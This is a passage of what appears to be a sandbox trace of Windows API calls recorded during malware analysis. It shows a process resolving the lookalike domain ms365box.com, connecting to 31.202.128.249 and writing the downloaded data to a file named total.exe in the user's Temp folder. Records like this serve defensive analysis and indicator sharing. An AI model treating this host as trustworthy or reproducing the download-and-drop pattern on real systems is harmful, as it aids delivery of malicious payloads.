[1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c78d640) returned 1 [0140.656] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2eaaf68, cbSid=0x1c78d5f0 | out: pSid=0x2eaaf68*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c78d5f0) returned 1 [0140.657] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2eabdb0, cbSid=0x1c78d5f0 | out: pSid=0x2eabdb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c78d5f0) returned 1 [0140.657] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2eacbc8, cbSid=0x1c78d5f0 | out: pSid=0x2eacbc8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c78d5f0) returned 1 [0140.657] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ead9f0, cbSid=0x1c78d5f0 | out: pSid=0x2ead9f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c78d5f0) returned 1 [0140.659] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2eae810, cbSid=0x1c78d5f0 | out: pSid=0x2eae810*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c78d5f0) returned 1 [0140.663] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x438 [0140.664] ioctlsocket (in: s=0x438, cmd=-2147195266, argp=0x1c78dc28 | out: argp=0x1c78dc28) returned 0 [0140.665] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x444 [0140.666] ioctlsocket (in: s=0x444, cmd=-2147195266, argp=0x1c78dc28 | out: argp=0x1c78dc28) returned 0 [0140.669] WSAIoctl (in: s=0x438, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c78dba0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c78dba0, lpOverlapped=0x0) returned -1 [0140.670] CoTaskMemAlloc (cb=0x204) returned 0x14e620 [0140.670] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x14e620, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0140.671] CoTaskMemFree (pv=0x14e620) [0140.671] WSAEventSelect (s=0x438, hEventObject=0x440, lNetworkEvents=512) returned 0 [0140.671] WSAIoctl (in: s=0x444, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c78dba0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c78dba0, lpOverlapped=0x0) returned -1 [0140.671] CoTaskMemAlloc (cb=0x204) returned 0x14e620 [0140.671] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x14e620, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0140.671] CoTaskMemFree (pv=0x14e620) [0140.671] WSAEventSelect (s=0x444, hEventObject=0x448, lNetworkEvents=512) returned 0 [0140.672] RasConnectionNotificationW (param_1=0xffffffffffffffff, param_2=0x44c, param_3=0x3) returned 0x0 [0140.676] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x1c78dce0 | out: phkResult=0x1c78dce0*=0x464) returned 0x0 [0140.678] RegNotifyChangeKeyValue (hKey=0x468, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x46c, fAsynchronous=1) returned 0x0 [0140.678] RegNotifyChangeKeyValue (hKey=0x470, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x474, fAsynchronous=1) returned 0x0 [0140.678] RegNotifyChangeKeyValue (hKey=0x478, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x47c, fAsynchronous=1) returned 0x0 [0140.678] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c78db58 | out: TokenHandle=0x1c78db58*=0x480) returned 1 [0140.683] GetCurrentProcess () returned 0xffffffffffffffff [0140.683] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c78d328 | out: TokenHandle=0x1c78d328*=0x484) returned 1 [0140.687] GetCurrentProcess () returned 0xffffffffffffffff [0140.687] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c78d328 | out: TokenHandle=0x1c78d328*=0x488) returned 1 [0140.714] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x1c78dc28 | out: pProxyConfig=0x1c78dc28) returned 1 [0140.868] SetEvent (hEvent=0x3d0) returned 1 [0140.903] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x1c78d9c8*=0x44c, lpdwindex=0x1c78d6e0 | out: lpdwindex=0x1c78d6e0) returned 0x80010115 [0140.903] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x1c78d9a8*=0x440, lpdwindex=0x1c78d6c0 | out: lpdwindex=0x1c78d6c0) returned 0x80010115 [0140.903] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x1c78d9a8*=0x448, lpdwindex=0x1c78d6c0 | out: lpdwindex=0x1c78d6c0) returned 0x80010115 [0140.903] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x1c78da58*=0x46c, lpdwindex=0x1c78d770 | out: lpdwindex=0x1c78d770) returned 0x80010115 [0140.904] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x1c78da58*=0x474, lpdwindex=0x1c78d770 | out: lpdwindex=0x1c78d770) returned 0x80010115 [0140.904] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x1c78da58*=0x47c, lpdwindex=0x1c78d770 | out: lpdwindex=0x1c78d770) returned 0x80010115 [0140.907] GetCurrentProcess () returned 0xffffffffffffffff [0140.907] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c78d398 | out: TokenHandle=0x1c78d398*=0x4e0) returned 1 [0140.908] GetCurrentProcess () returned 0xffffffffffffffff [0140.908] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c78d398 | out: TokenHandle=0x1c78d398*=0x4e4) returned 1 [0140.932] SetEvent (hEvent=0x3d0) returned 1 [0140.991] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x1c78d868 | out: pFixedInfo=0x0, pOutBufLen=0x1c78d868) returned 0x6f [0141.006] GetNetworkParams (in: pFixedInfo=0x1b85b450, pOutBufLen=0x1c78d868 | out: pFixedInfo=0x1b85b450, pOutBufLen=0x1c78d868) returned 0x0 [0141.026] CoTaskMemAlloc (cb=0xd) returned 0x1b842f20 [0141.026] inet_addr (cp="192.168.0.1") returned 0x100a8c0 [0141.026] CoTaskMemFree (pv=0x1b842f20) [0141.029] LocalFree (hMem=0x1b85b450) returned 0x0 [0141.042] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4f8 [0141.043] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4f4 [0141.044] CoTaskMemAlloc (cb=0xe) returned 0x1b842f20 [0141.045] getaddrinfo (in: pNodeName="ms365box.com", pServiceName=0x0, pHints=0x1c78d810*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1c78d808 | out: ppResult=0x1c78d808*=0x1b852290*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="ms365box.com", ai_addr=0x1b842e80*(sa_family=2, sin_port=0x0, sin_addr="31.202.128.249"), ai_next=0x0)) returned 0 [0141.055] CoTaskMemFree (pv=0x1b842f20) [0141.055] CoTaskMemFree (pv=0x0) [0141.055] FreeAddrInfoW (pAddrInfo=0x1b852290*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="獭㘳戵硯挮浯", ai_addr=0x1b842e80*(sa_family=2, sin_port=0x0, sin_addr="31.202.128.249"), ai_next=0x0)) [0141.056] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x500 [0141.056] ioctlsocket (in: s=0x500, cmd=-2147195266, argp=0x1c78d828 | out: argp=0x1c78d828) returned 0 [0141.056] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x50c [0141.057] ioctlsocket (in: s=0x50c, cmd=-2147195266, argp=0x1c78d828 | out: argp=0x1c78d828) returned 0 [0141.057] WSAIoctl (in: s=0x500, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c78d7a0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c78d7a0, lpOverlapped=0x0) returned -1 [0141.057] CoTaskMemAlloc (cb=0x204) returned 0x14ec50 [0141.057] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x14ec50, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0141.057] CoTaskMemFree (pv=0x14ec50) [0141.057] WSAEventSelect (s=0x500, hEventObject=0x508, lNetworkEvents=512) returned 0 [0141.057] WSAIoctl (in: s=0x50c, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c78d7a0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c78d7a0, lpOverlapped=0x0) returned -1 [0141.057] CoTaskMemAlloc (cb=0x204) returned 0x14ec50 [0141.057] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x14ec50, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0141.058] CoTaskMemFree (pv=0x14ec50) [0141.058] WSAEventSelect (s=0x50c, hEventObject=0x510, lNetworkEvents=512) returned 0 [0141.059] GetAdaptersAddresses () returned 0x6f [0141.065] GetAdaptersAddresses () returned 0x0 [0141.079] WSAConnect (in: s=0x4f8, name=0x2eba318*(sa_family=2, sin_port=0x50, sin_addr="31.202.128.249"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0141.142] closesocket (s=0x4f4) returned 0 [0141.168] send (in: s=0x4f8, buf=0x2ebddc0*, len=70, flags=0 | out: buf=0x2ebddc0*) returned 70 [0141.172] setsockopt (s=0x4f8, level=65535, optname=4102, optval="\xa0\x86\x01", optlen=4) returned 0 [0141.172] recv (in: s=0x4f8, buf=0x2eb6860, len=4096, flags=0 | out: buf=0x2eb6860*) returned 479 [0141.228] setsockopt (s=0x4f8, level=65535, optname=4102, optval="\xe0\x93\x04", optlen=4) returned 0 [0141.253] VirtualQuery (in: lpAddress=0x1c78d400, lpBuffer=0x1c78e2c0, dwLength=0x30 | out: lpBuffer=0x1c78e2c0*(BaseAddress=0x1c78d000, AllocationBase=0x1be00000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0141.257] CoTaskMemAlloc (cb=0x104) returned 0x1b869280 [0141.257] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b869280, nSize=0x80 | out: lpBuffer="") returned 0x0 [0141.257] CoTaskMemFree (pv=0x1b869280) [0141.258] CoTaskMemAlloc (cb=0x104) returned 0x1b869280 [0141.258] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x1b869280, nSize=0x80 | out: lpBuffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 0x24 [0141.258] CoTaskMemFree (pv=0x1b869280) [0141.301] CoTaskMemAlloc (cb=0x104) returned 0x1b869280 [0141.301] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x1b869280, nSize=0x80 | out: lpBuffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 0x24 [0141.302] CoTaskMemFree (pv=0x1b869280) [0141.359] GetLongPathNameW (in: lpszShortPath="C:\\Users\\ADU0VK~1\\", lpszLongPath=0x1c78cf90, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\aDU0VK IWA5kLS\\") returned 0x18 [0141.359] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Temp\\total.exe", nBufferLength=0x105, lpBuffer=0x1c78d010, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Temp\\total.exe", lpFilePart=0x0) returned 0x34 [0141.360] SetErrorMode (uMode=0x1) returned 0x1 [0141.360] CreateFileW (lpFileName="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Temp\\total.exe" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\local\\temp\\total.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4f4 [0141.360] GetFileType (hFile=0x4f4) returned 0x1 [0141.360] SetErrorMode (uMode=0x1) returned 0x1 [0141.360] GetFileType (hFile=0x4f4) returned 0x1 [0141.360] SetEvent (hEvent=0x3d0) returned 1 [0141.361] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x1c78d048*=0x44c, lpdwindex=0x1c78cd60 | out: lpdwindex=0x1c78cd60) returned 0x80010115 [0141.361] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x1c78d028*=0x440, lpdwindex=0x1c78cd40 | out: lpdwindex=0x1c78cd40) returned 0x80010115 [0141.361] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x1c78d028*=0x448, lpdwindex=0x1c78cd40 | out: lpdwindex=0x1c78cd40) returned 0x80010115 [0141.362] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x1c78d0d8*=0x46c, lpdwindex=0x1c78cdf0 | out: lpdwindex=0x1c78cdf0) returned 0x80010115 [0141.362] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x1c78d0d8*=0x474, lpdwindex=0x1c78cdf0 | out: lpdwindex=0x1c78cdf0) returned 0x80010115 [0141.362] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x1c78d0d8*=0x47c, lpdwindex=0x1c78cdf0 | out: lpdwindex=0x1c78cdf0) returned 0x80010115 [0141.363] select (in: nfds=0, readfds=0x2eed5a8, writefds=0x0, exceptfds=0x0, timeout=0x1c78d300 | out: readfds=0x2eed5a8, writefds=0x0, exceptfds=0x0) returned 0 [0141.364] send (in: s=0x4f8, buf=0x2eed768*, len=41, flags=0 | out: buf=0x2eed768*) returned 41 [0141.365] setsockopt (s=0x4f8, level=65535, optname=4102, optval="\xa0\x86\x01", optlen=4) returned 0 [0141.365] recv (in: s=0x4f8, buf=0x2eb6860, len=4096, flags=0 | out: buf=0x2eb6860*) returned 4096 [0141.421] setsockopt (s=0x4f8, level=65535, optname=4102, optval="\xe0\x93\x04", optlen=4) returned 0 [0141.421] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 7584 [0141.422] WriteFile (in: hFile=0x4f4, lpBuffer=0x2efe368*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c78d458, lpOverlapped=0x0 | out: lpBuffer=0x2efe368*, lpNumberOfBytesWritten=0x1c78d458*=0x1000, lpOverlapped=0x0) returned 1 [0141.423] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee451*, nNumberOfBytesToWrite=0x1c9f, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee451*, lpNumberOfBytesWritten=0x1c78d4b8*=0x1c9f, lpOverlapped=0x0) returned 1 [0141.423] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 23360 [0141.482] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0x5b40, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0x5b40, lpOverlapped=0x0) returned 1 [0141.482] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 2920 [0141.482] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 23360 [0141.531] WriteFile (in: hFile=0x4f4, lpBuffer=0x2efe368*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c78d458, lpOverlapped=0x0 | out: lpBuffer=0x2efe368*, lpNumberOfBytesWritten=0x1c78d458*=0x1000, lpOverlapped=0x0) returned 1 [0141.531] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee7e8*, nNumberOfBytesToWrite=0x56a8, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee7e8*, lpNumberOfBytesWritten=0x1c78d4b8*=0x56a8, lpOverlapped=0x0) returned 1 [0141.531] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 35040 [0141.587] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0x88e0, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0x88e0, lpOverlapped=0x0) returned 1 [0141.589] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 54020 [0141.589] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0xd304, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0xd304, lpOverlapped=0x0) returned 1 [0141.590] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 1460 [0141.590] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 14600 [0141.646] WriteFile (in: hFile=0x4f4, lpBuffer=0x2efe368*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c78d458, lpOverlapped=0x0 | out: lpBuffer=0x2efe368*, lpNumberOfBytesWritten=0x1c78d458*=0x1000, lpOverlapped=0x0) returned 1 [0141.646] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eeed9c*, nNumberOfBytesToWrite=0x2ebc, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eeed9c*, lpNumberOfBytesWritten=0x1c78d4b8*=0x2ebc, lpOverlapped=0x0) returned 1 [0141.646] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 65536 [0141.647] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0x10000, lpOverlapped=0x0) returned 1 [0141.648] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 14764 [0141.648] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0x39ac, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0x39ac, lpOverlapped=0x0) returned 1 [0141.648] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 16060 [0141.652] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0x3ebc, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0x3ebc, lpOverlapped=0x0) returned 1 [0141.653] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 54020 [0141.654] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0xd304, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0xd304, lpOverlapped=0x0) returned 1 [0141.654] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 16060 [0141.697] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0x3ebc, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0x3ebc, lpOverlapped=0x0) returned 1 [0141.698] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 24820 [0141.699] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0x60f4, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0x60f4, lpOverlapped=0x0) returned 1 [0141.700] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 26280 [0141.701] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0x66a8, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0x66a8, lpOverlapped=0x0) returned 1 [0141.702] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 14600 [0141.703] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0x3908, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0x3908, lpOverlapped=0x0) returned 1 [0141.704] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 8760 [0141.704] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0x2238, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0x2238, lpOverlapped=0x0) returned 1 [0141.704] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 3472 [0141.708] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 50548 [0141.709] WriteFile (in: hFile=0x4f4, lpBuffer=0x2efe368*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c78d458, lpOverlapped=0x0 | out: lpBuffer=0x2efe368*, lpNumberOfBytesWritten=0x1c78d458*=0x1000, lpOverlapped=0x0) returned 1 [0141.709] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee5c0*, nNumberOfBytesToWrite=0xc304, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee5c0*, lpNumberOfBytesWritten=0x1c78d4b8*=0xc304, lpOverlapped=0x0) returned 1 [0141.712] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 42340 [0141.712] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0xa564, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0xa564, lpOverlapped=0x0) returned 1 [0141.717] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 54020 [0141.718] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0xd304, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0xd304, lpOverlapped=0x0) returned 1 [0141.723] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 64240 [0141.723] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0xfaf0, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0xfaf0, lpOverlapped=0x0) returned 1 [0141.727] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 35040 [0141.727] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0x88e0, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0x88e0, lpOverlapped=0x0) returned 1 [0141.728] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 43800 [0141.754] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0xab18, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0xab18, lpOverlapped=0x0) returned 1 [0141.755] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 52560 [0141.760] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0xcd50, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0xcd50, lpOverlapped=0x0) returned 1 [0141.763] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 39420 [0141.763] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0x99fc, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0x99fc, lpOverlapped=0x0) returned 1 [0141.766] recv (in: s=0x4f8, buf=0x2eee350, len=31437, flags=0 | out: buf=0x2eee350*) returned 24820 [0141.766] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0x60f4, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0x60f4, lpOverlapped=0x0) returned 1 [0141.767] recv (in: s=0x4f8, buf=0x2eee350, len=6617, flags=0 | out: buf=0x2eee350*) returned 5840 [0141.767] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0x16d0, lpNumberOfBytesWritten=0x1c78d4b8, 